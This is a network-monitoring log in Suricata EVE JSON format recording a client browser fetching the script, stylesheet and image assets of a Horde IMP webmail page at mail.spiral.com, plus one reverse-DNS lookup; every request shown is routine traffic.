{"timestamp":"2020-02-29T00:23:13.557270+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport_utils.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":733}} {"timestamp":"2020-02-29T00:23:13.557697+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4980},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/dynamic\/screen.css","state":"CLOSED","stored":false,"size":24076,"tx_id":3}} {"timestamp":"2020-02-29T00:23:13.559538+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport_utils.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":733},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/viewport_utils.js","state":"CLOSED","stored":false,"size":1748,"tx_id":0}} {"timestamp":"2020-02-29T00:23:13.559949+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpcore.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3881}} {"timestamp":"2020-02-29T00:23:13.562336+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/contextsensitive.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3855}} {"timestamp":"2020-02-29T00:23:13.563141+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/contextsensitive.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3855},"app_proto":"http","fileinfo":{"filename":"\/js\/contextsensitive.js","state":"CLOSED","stored":false,"size":12330,"tx_id":1}} {"timestamp":"2020-02-29T00:23:13.566870+0000","flow_id":1779901807041841,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52976,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/tinycon.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3108}} {"timestamp":"2020-02-29T00:23:13.563707+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/passphrase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":490}} {"timestamp":"2020-02-29T00:23:13.569736+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52978,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/dragdrop2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5927}} {"timestamp":"2020-02-29T00:23:13.571705+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/passphrase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":490},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/passphrase.js","state":"CLOSED","stored":false,"size":1009,"tx_id":2}} {"timestamp":"2020-02-29T00:23:13.572319+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13568}} {"timestamp":"2020-02-29T00:23:13.574621+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52978,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/dragdrop2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5927},"app_proto":"http","fileinfo":{"filename":"\/js\/dragdrop2.js","state":"CLOSED","stored":false,"size":22457,"tx_id":0}} {"timestamp":"2020-02-29T00:23:13.574974+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52978,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/jstorage.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4195}} {"timestamp":"2020-02-29T00:23:13.577326+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpcore.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3881},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/dimpcore.js","state":"CLOSED","stored":false,"size":13894,"tx_id":4}} {"timestamp":"2020-02-29T00:23:13.582471+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpbase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":30030}} {"timestamp":"2020-02-29T00:23:13.584270+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13568},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/viewport.js","state":"CLOSED","stored":false,"size":58788,"tx_id":3}} {"timestamp":"2020-02-29T00:23:13.584818+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpbase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":30030},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/dimpbase.js","state":"TRUNCATED","stored":false,"size":106496,"tx_id":5}} {"timestamp":"2020-02-29T00:23:13.585514+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/js\/slider2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2408}} {"timestamp":"2020-02-29T00:23:13.588348+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/slider2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2408},"app_proto":"http","fileinfo":{"filename":"\/js\/slider2.js","state":"CLOSED","stored":false,"size":7582,"tx_id":6}} {"timestamp":"2020-02-29T00:23:13.588817+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/js\/dialog.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1316}} {"timestamp":"2020-02-29T00:23:13.592254+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/dialog.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1316},"app_proto":"http","fileinfo":{"filename":"\/js\/dialog.js","state":"CLOSED","stored":false,"size":4046,"tx_id":7}} {"timestamp":"2020-02-29T00:23:13.592593+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/js\/toggle_quotes.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":502}} {"timestamp":"2020-02-29T00:23:13.593849+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/toggle_quotes.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":502},"app_proto":"http","fileinfo":{"filename":"\/js\/toggle_quotes.js","state":"CLOSED","stored":false,"size":1054,"tx_id":4}} {"timestamp":"2020-02-29T00:23:13.592875+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/imp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1763}} {"timestamp":"2020-02-29T00:23:13.594116+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/base64.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1962}} {"timestamp":"2020-02-29T00:23:13.642877+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/imp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1763},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/imp.js","state":"CLOSED","stored":false,"size":5736,"tx_id":8}} {"timestamp":"2020-02-29T00:23:13.685357+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/popdown.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":191}} {"timestamp":"2020-02-29T00:23:13.744096+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/popdown.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":191},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/popdown.png","state":"CLOSED","stored":false,"size":191,"tx_id":9}} {"timestamp":"2020-02-29T00:23:13.744418+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131}} {"timestamp":"2020-02-29T00:23:13.766355+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidevert.png","state":"CLOSED","stored":false,"size":131,"tx_id":10}} {"timestamp":"2020-02-29T00:23:13.768362+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":478}} {"timestamp":"2020-02-29T00:23:13.770424+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":478},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/reload.png","state":"CLOSED","stored":false,"size":478,"tx_id":11}} {"timestamp":"2020-02-29T00:23:13.775452+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":340}} {"timestamp":"2020-02-29T00:23:13.776683+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/base64.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1962},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/external\/base64.js","state":"CLOSED","stored":false,"size":6586,"tx_id":5}} {"timestamp":"2020-02-29T00:23:13.777482+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":96}} {"timestamp":"2020-02-29T00:23:13.777995+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":96},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidehoriz.png","state":"CLOSED","stored":false,"size":96,"tx_id":6}} {"timestamp":"2020-02-29T00:23:13.778444+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":340},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/checkbox_off.png","state":"CLOSED","stored":false,"size":340,"tx_id":12}} {"timestamp":"2020-02-29T00:23:13.794129+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":97}} {"timestamp":"2020-02-29T00:23:13.803596+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/ico_message_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":468}} {"timestamp":"2020-02-29T00:23:13.804330+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/ico_message_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":468},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/ico_message_off.png","state":"CLOSED","stored":false,"size":468,"tx_id":7}} {"timestamp":"2020-02-29T00:23:13.804922+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13593}} {"timestamp":"2020-02-29T00:23:13.810002+0000","flow_id":2045141807356946,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":32775,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":57668,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:23:13.834778+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":97},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidehoriz-bg.png","state":"CLOSED","stored":false,"size":97,"tx_id":13}} 